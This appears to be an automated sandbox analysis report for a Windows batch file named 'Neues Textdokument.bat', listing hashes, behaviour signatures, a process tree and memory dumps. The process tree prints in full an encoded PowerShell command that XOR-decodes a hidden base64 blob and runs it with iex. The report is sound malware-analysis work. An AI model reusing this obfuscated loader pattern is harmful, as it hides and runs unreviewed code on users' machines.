Overview

overview

1

Static

static

1

Neues Text...nt.bat

windows10-2004-x64

1

Analysis

  • max time kernel
    66s
  • max time network
    59s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240419-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01/05/2024, 15:25

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    Neues Textdokument.bat

  • Size

    7KB

  • MD5

    fb9881991083fe48bf5d908485207f3f

  • SHA1

    17a5d59ae95279fc8019f01301208c5016a3a9e2

  • SHA256

    605d69f7eccf74b902486dbc3a59d631e823274501ee266786e05017dc76dca6

  • SHA512

    e295c83ec56e4e9ed447008933f79529556366dc56ec3a77119d00959653353ab32e96fd61b0358a39a4587cc7db21c0c97d67dd4d67e0a7729076319c2c7372

  • SSDEEP

    192:jogq2/vVZcy16qws74gJt4ngzHrImqtcsaWrhXrDLYPEDjb3jLJ+QUJ:jopGvVZz6qws74S+ngzstcpshXrDUsDm

Score
1/10

Malware Config

Signatures

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Neues Textdokument.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3752
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoExit -encodedCommand JABoAGUAaABlAGgAZQAgAD0AIAAiAE4AQwBjADgATQBTAFkANwBQAFQAeAB5AEgAagAwADkATwBTAGMAaQBGAEMAYwA4AE0AWABJAHAAWAAxAGgAeQBjAG4ASgB5AEEAagBNAGcATQB6ADkAeQBlAG4AWQAvAFAAVABZAG4AUABqAGMAYwBNAHoAOAAzAGYAbgBKADIATgBDAGMAOABNAFMAWQA3AFAAVAB3AGMATQB6ADgAMwBlADEAOQBZAGMAbgBKAHkAYwBuAFkAegBJAFMARQAzAFAAMwBKAHYAYwBuAG8ASgBFAHkASQBpAEYAagAwAC8ATQB6AHMAOABEADIAaABvAEUAUwBjAGcASQBEAGMAOABKAGgAWQA5AFAAegBNADcAUABIAHcAVgBOAHkAWQBUAEkAUwBFADMAUAB6AEEAKwBPAHoAYwBoAGUAbgB0AHkATABsADkAWQBjAG4ASgB5AGMAZwBVADYATgB5AEEAMwBmAHgAMAB3AE8ARABjAHgASgBuAEkAcABjAG4AWQBOAGYAQgBVACsAUABUAEEAegBQAGgATQBoAEkAVABjAC8ATQBEADQAcgBFAFQATQB4AE8AagBkAHkAZgB4AE0AOABOAG4ASgAyAEQAWAB3AGUAUABUAEUAegBKAGoAcwA5AFAASAB3AEIASQBqADQANwBKAG4AcAAxAEQAZwA1ADEAZQB3AGwALwBZAHcAOQA4AFgAMQBoAHkAYwBuAEoAeQBjAGgAYwBqAEoAegBNACsASQBYAHAAMQBBAFMAcwBoAEoAagBjAC8AZgBEAFkAKwBQAG4AVgA3AFgAMQBoAHkAYwBuAEoAeQBjAGkAOQA3AGYAQgBVADMASgBnAFkAcgBJAGoAZAA2AGQAUgA4ADcATQBTAEEAOQBJAFQAMAAwAEoAbgB3AEYATwB6AHgAaABZAEgAdwBIAFAAQwBFAHoATgBEAGMAYwBNAHkAWQA3AEoARABjAGYATgB5AFkANgBQAFQAWQBoAGQAWAB0AGYAVwBIAEoAeQBjAG4ASgAyAEoAagA4AGkAYgB4AEoANgBlADEAOQBZAGMAbgBKAHkAYwBuAFkAegBJAFMARQAzAFAAMwB3AFYATgB5AFkAZgBOAHkAWQA2AFAAVABZAGgAZQBuAHQAeQBMAG4ASQBVAFAAUwBBAFgATQB6AEUANgBmAHgAMAB3AE8ARABjAHgASgBuAEkAcABHAHoAUgA2AGQAZwAxADgASABEAE0ALwBOADMASgAvAFAAagBzADUATgAzAEoAdwBGAFQAZAA0AEEAbgBnADkATQBYAGcAMgBOAGkAQQAzAEkAUwBGAHcAZQAzAEkAcABkAGkAWQAvAEkAbgBsAHYAZABnADAAdgBMADEAOQBZAGMAbgBKAHkAYwBpAEEAMwBKAGkAYwBnAFAASABKADIASgBqADgAaQBDAFcASQBQAGYAQgBzADgASgBEADAANQBOADMAcAAyAFAAQwBjACsAUABuADUAeQBFAG4AcAA2AGQAagBNAGgASQBUAGMALwBmAEIAVQAzAEoAaAA4ADMASgBqAG8AOQBOAG4AcAAxAEYAVABjAG0ASAB6ADAAMgBKAHoANAAzAEcAagBNADgATgBqADQAMwBkAFgAdAA3AGYAQgBzADgASgBEADAANQBOADMAcAAyAFAAQwBjACsAUABuADUAZgBXAEIASgA2AGQAagA4ADkATgBpAGMAKwBOAHgAdwB6AFAAegBkADcAZQAzADUAeQBkAGoAUQBuAFAARABFAG0ATwB6ADAAOABIAEQATQAvAE4AMwB0ADcAWAAxAGcAdgBYADEAaABmAFcARgA5AFkATgBDAGMAOABNAFMAWQA3AFAAVAB4AHkATgBUAGMAbQBGAGoAYwArAE4AegBVAHoASgBqAGMARwBLAHkASQAzAGMAaQBsAGYAVwBIAEoAeQBjAG4ASQBDAE0AeQBBAHoAUAAzAEoANgBYADEAaAB5AGMAbgBKAHkAYwBnAGsAQwBNAHkAQQB6AFAAegBjAG0ATgB5AEIANgBBAGoAMABoAE8AeQBZADcAUABUAHgAeQBiADMASgBpAGYAbgBJAGYATQB6AHcAMgBNAHkAWQA5AEkAQwB0AHkAYgAzAEoAMgBCAGkAQQBuAE4AMwBzAFAAYwBnAGsARwBLAHkASQAzAEMAUQA4AFAAWAAxAGgAeQBjAG4ASgB5AGMAbgBZADAASgB6AHcAeABmAG4ASQBKAEEAagBNAGcATQB6ADgAMwBKAGoAYwBnAGUAZwBJADkASQBUAHMAbQBPAHoAMAA4AGMAbQA5AHkAWQAzAHMAUABjAGcAawBHAEsAeQBJADMARAAzAEoAMgBOAGoAYwArAEIAaQBzAGkATgAzAEoAdgBjAGcAawBFAFAAVABzADIARAAxADkAWQBjAG4ASgB5AGMAbgB0AGYAVwBIAEoAeQBjAG4ASgAyAEoAaQBzAGkATgAzAEoAdgBjAGcAawBUAEkAaQBJAFcAUABUADgAegBPAHoAdwBQAGEARwBnAFIASgB5AEEAZwBOAHoAdwBtAEYAagAwAC8ATQB6AHMAOABmAEYAOQBZAGMAbgBKAHkAYwBoAFkAMwBOAEQAcwA4AE4AeABZAHIAUABEAE0ALwBPAHoARQBUAEkAUwBFADMAUAB6AEEAKwBLADMAcAA2AEgARABjAGwAZgB4ADAAdwBPAEQAYwB4AEoAbgBJAEIASwB5AEUAbQBOAHoAOQA4AEEARABjADAAUABqAGMAeABKAGoAcwA5AFAASAB3AFQASQBTAEUAMwBQAHoAQQArAEsAeAB3AHoAUAB6AGQANgBkAFEAQQAzAE4ARAA0ADMATQBTAFkAMwBOAGgAWQAzAFAAagBjADEATQB5AFkAMwBkAFgAdAA3AGYAbAA5AFkAQwBRAEUAcgBJAFMAWQAzAFAAMwB3AEEATgB6AFEAKwBOAHoARQBtAE8AegAwADgAZgBCAGMALwBPAHkAWgA4AEUAeQBFAGgATgB6ADgAdwBQAGkAcwBRAEoAegBzACsATgBqAGMAZwBFAHoARQB4AE4AeQBFAGgARAAyAGgAbwBBAEMAYwA4AGUAMwB4AGYAVwBIAEoAeQBjAG4ASQBXAE4AegBRADcAUABEAGMAVwBLAHoAdwB6AFAAegBzAHgASAB6ADAAMgBKAHoANAAzAGUAbgBVAGIAUABCADgAMwBQAHoAMABnAEsAeAA4ADkATgBpAGMAKwBOADMAVgArAGMAbgBZADAATQB6ADQAaABOADMAdAA4AFgAMQBoAHkAYwBuAEoAeQBGAGoAYwAwAE8AegB3ADMAQgBpAHMAaQBOADMAcAAxAEgAeQBzAFcATgB6ADQAMwBOAFQATQBtAE4AdwBZAHIASQBqAGQAMQBmAG4ASgAxAEUAVAA0AHoASQBTAEYAKwBjAGcASQBuAE0ARAA0ADcATQBYADUAeQBBAFQAYwB6AFAAagBjADIAZgBuAEkAVABQAEMARQA3AEUAVAA0AHoASQBTAEYAKwBYADEAaAB5AGMAbgBKAHkARQB5AGMAbQBQAFIARQArAE0AeQBFAGgAZABYADUAeQBDAFEARQByAEkAUwBZADMAUAAzAHcAZgBKAHoANABtAE8AegBFAHoASQBTAFkAVwBOAHoANAAzAE4AVABNAG0ATgB3ADkANwBYADEAaABmAFcASABKAHkAZABpAFkAcgBJAGoAZAA4AFgAMQBoAHkAYwBuAEoAeQBGAGoAYwAwAE8AegB3ADMARQBUADAAOABJAFMAWQBnAEoAegBFAG0AUABTAEIANgBkAFEAQQBHAEEAUwBJADMATQBUAHMAegBQAGgAdwB6AFAAegBkACsAYwBoAG8ANwBOAGoAYwBRAEsAdwBFADcATgBYADUAeQBBAGkAYwB3AFAAagBzAHgAZABYADUAZgBXAEEAawBCAEsAeQBFAG0ATgB6ADkAOABBAEQAYwAwAFAAagBjAHgASgBqAHMAOQBQAEgAdwBSAE0AegA0ACsATwB6AHcAMQBFAFQAMAA4AEoARABjADgASgBqAHMAOQBQAEMARQBQAGEARwBnAEIASgBqAE0AOABOAGoATQBnAE4AbgA1AHkAZABqAFEAbgBQAEQARgA3AGYARgA5AFkAYwBuAEoAeQBjAG4ASQBCAE4AeQBZAGIAUAB5AEkAKwBOAHoAOAAzAFAAQwBZAHoASgBqAHMAOQBQAEIAUQArAE0AegBVAGgAZQBuAFUAQQBKAHoAdwBtAE8AegA4ADMAZgBuAEkAZgBNAHoAdwB6AE4AVABjADIAZABYAHQAZgBXAEYAOQBZAGMAbgBKADIASgBpAHMAaQBOADMAeABmAFcASABKAHkAYwBuAEkAVwBOAHoAUQA3AFAARABjAGYATgB5AFkANgBQAFQAWgA2AGQAUgBzADgASgBEADAANQBOADMAVgArAGMAbgBVAEMASgB6AEEAKwBPAHoARgArAGMAaABvADcATgBqAGMAUQBLAHcARQA3AE4AWAA1AHkASABEAGMAbABBAFQANAA5AEoAbgA1AHkAQgBEAHMAZwBKAGkAYwB6AFAAbgBWACsAYwBuAFkAMgBOAHoANABHAEsAeQBJADMAZgBsADkAWQBkAGoAUQBuAFAARABGADcAZgBIAEkAQgBOAHkAWQBiAFAAeQBJACsATgB6ADgAMwBQAEMAWQB6AEoAagBzADkAUABCAFEAKwBNAHoAVQBoAGUAbgBVAEEASgB6AHcAbQBPAHoAOAAzAGYAbgBJAGYATQB6AHcAegBOAFQAYwAyAGQAWAB0AGYAVwBIAEoAeQBjAG4ASQBnAE4AeQBZAG4ASQBEAHgAeQBkAGkAWQByAEkAagBkADgARQBTAEEAMwBNAHkAWQAzAEIAaQBzAGkATgAzAHAANwBYADEAZwB2AFgAMQBoAGYAVwBGADkAWQBDAFIAcwA4AEoAZwBJAG0ASQBBADkAMgBOAEMAYwA4AE0AUgBNADIATgBpAEIAeQBiADMASQBlAFAAVAAwADUASgB5AEkAVQBKAHoAdwB4AGMAagBNAC8ASQBUAHQAOABOAGoANAArAGMAaABNAC8ASQBUAHMAZABJAGoAYwA4AEEAVABjAGgASQBUAHMAOQBQAEYAOQBZAGQAagAwACsATgBnAEkAZwBQAFMAWQAzAE0AUwBZADcAUABUAHcAUQBKAHoAUQAwAE4AeQBCAHkAYgAzAEoAaQBYADEAaAAyAEoAQwBKAHYAQwBRAEUAcgBJAFMAWQAzAFAAMwB3AEEASgB6AHcAbQBPAHoAOAAzAGYAQgBzADgASgBqAGMAZwBQAFMASQBCAE4AeQBBAGsATwB6AEUAMwBJAFgAdwBmAE0AeQBBAGgATwBqAE0AKwBEADIAaABvAEYAVABjAG0ARgBqAGMAKwBOAHoAVQB6AEoAagBjAFUAUABTAEEAVQBKAHoAdwB4AEoAagBzADkAUABBAEkAOQBPAHoAdwBtAE4AeQBCADYAZQBoADQAOQBQAFQAawBuAEkAaABRAG4AUABEAEYAeQBPAFQAYwBnAFAARABjACsAWQBXAEIAOABOAGoANAArAGMAZwBRADcASQBDAFkAbgBNAHoANABDAEkARAAwAG0ATgB6AEUAbQBlADMANQB5AGUAagBVADMASgBoAFkAMwBQAGoAYwAxAE0AeQBZADMAQgBpAHMAaQBOADMASQBTAGUAZwBrAGIAUABDAFkAQwBKAGkAQQBQAGYAbgBJAEoAQgB4AHMAOABKAG0ARgBnAEQAMwA1AHkAQwBRAGMAYgBQAEMAWgBoAFkAQQA5ACsAYwBnAGsASABHAHoAdwBtAFkAVwBBAFAAZgBCADgAegBPAFQAYwBRAEsAdwBBADMATgBBAFkAcgBJAGoAZAA2AGUAMwB0AHkAZQBnAGsAUQBQAFQAMAArAEQAMwB0ADcAZQAxADkAWQBkAGkAUQBpAGYAQgBzADgASgBEADAANQBOADMAcAAyAE4AQwBjADgATQBSAE0AMgBOAGkAQgArAGMAbQBGACsAYwBtAEkAcQBaAG0ASgArAGMAZwBrAGcATgB6AFEAUABkAGoAMAArAE4AZwBJAGcAUABTAFkAMwBNAFMAWQA3AFAAVAB3AFEASgB6AFEAMABOAHkAQgA3AFgAMQBoADIATQBDAGMAMABjAG0AOQB5AEMAUgBBAHIASgBqAGMASgBEAHcAOQB5AGUAbQBJAHEAWgBtAHAAKwBZAGkAcABoAFkAMwA1AGkASwBqAEYAcgBlADEAOQBZAEMAUQBFAHIASQBTAFkAMwBQADMAdwBBAEoAegB3AG0ATwB6ADgAMwBmAEIAcwA4AEoAagBjAGcAUABTAEkAQgBOAHkAQQBrAE8AegBFADMASQBYAHcAZgBNAHkAQQBoAE8AagBNACsARAAyAGgAbwBFAFQAMABpAEsAMwBwADIATQBDAGMAMABmAG4ASgBpAGYAbgBKADIATgBDAGMAOABNAFIATQAyAE4AaQBCACsAYwBtAEYANwBYADEAZwBsAE4AVABjAG0AYwBuAEEANgBKAGkAWQBpAEkAVwBoADkAZgBTAFUAbABKAFgAdwAyAEkARAAwAGkATQBEADAAcQBmAEQARQA5AFAAMwAwAGgATQBUADUAOQBOAEQAdAA5AFAAagBFAGgAUABEAFIAbABJAFMATgBoAFoAUwB0AGoAUABtAFoAcQBQAHkAZwA4AFoAUwBWAG4AZgBSAHAALwBIAFMAYwBtAEkAaQBjAG0AZgBEAGMAcQBOADIAMABnAFAAagBrADMASwAyADgANwBNAEMAWQB4AFkAbQBJAGkASQBqAG8AMQBJAHkAVgBtAFkAMgBCAHIAWQBUADAAbwBLAGoAdwB3AFkARwBNAHcAZABDAEUAbQBiAHkAZwBvAFkAUwBzAHcATQBEAGsAawBkAEQAWQArAGIAMgBOACsAYwBIAEoALwBIAFgASgB3AEUAVwBnAE8AQgB5AEUAMwBJAEMARQBPAGQAagBjADgASgBHAGcASABBAFIAYwBBAEgAQgBNAGYARgB3ADQAVABJAGkASQBXAE0AeQBZAHoARABoADQAOQBNAFQATQArAEQAZwBZADMAUAB5AEkATwBHAG4AOABkAEoAeQBZAGkASgB5AFoAOABOAHkAbwAzAGMARgA5AFkAQQBTAFkAegBJAEMAWgAvAEEAaQBBADkATQBUAGMAaABJAFgASgAvAEYARABzACsATgB3AEkAegBKAGoAcAB5AGMAQgBGAG8ARABnAGMAaABOAHkAQQBoAEQAbgBZADMAUABDAFIAbwBCAHcARQBYAEEAQgB3AFQASAB4AGMATwBFAHkASQBpAEYAagBNAG0ATQB3ADQAZQBQAFQARQB6AFAAZwA0AEcATgB6ADgAaQBEAGgAcAAvAEgAUwBjAG0ASQBpAGMAbQBmAEQAYwBxAE4AMwBCAHkAIgANAAoAJABYAG8AcgBfAFYAYQBsACAAPQAgADgAMgANAAoAJAB4AHIAIAA9ACAAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGgAZQBoAGUAaABlACkADQAKACQAZgBhAGYAYQBmACAAPQAgACQAeAByACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAByAGUAdAB1AHIAbgAgACQAXwAgAC0AYgB4AG8AcgAgACQAWABvAHIAXwBWAGEAbAAgAH0ADQAKACQAZABlAGMAcwBjAHIAIAA9ACAAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AHUAdABmADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAZgBhAGYAYQBmACkADQAKAGkAZQB4ACAAJABkAGUAYwBzAGMAcgANAAoA
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:932

Network

        MITRE ATT&CK Matrix

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hs0knos4.x0k.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          Download Submit

        • memory/932-9-0x0000015102D00000-0x0000015102D22000-memory.dmp

          Filesize

          136KB

          Download

        • memory/932-10-0x00007FFEE9FA0000-0x00007FFEEAA61000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/932-12-0x000001511B3A0000-0x000001511B3B0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/932-11-0x000001511B3A0000-0x000001511B3B0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/932-13-0x000001511C0A0000-0x000001511C0E4000-memory.dmp

          Filesize

          272KB

          Download

        • memory/932-14-0x000001511B3A0000-0x000001511B3B0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/932-15-0x000001511B3A0000-0x000001511B3B0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/932-16-0x000001511C170000-0x000001511C1E6000-memory.dmp

          Filesize

          472KB

          Download

        • memory/932-18-0x00007FFEE9FA0000-0x00007FFEEAA61000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/932-19-0x000001511B3A0000-0x000001511B3B0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/932-20-0x000001511B3A0000-0x000001511B3B0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/932-21-0x000001511B3A0000-0x000001511B3B0000-memory.dmp

          Filesize

          64KB

          Download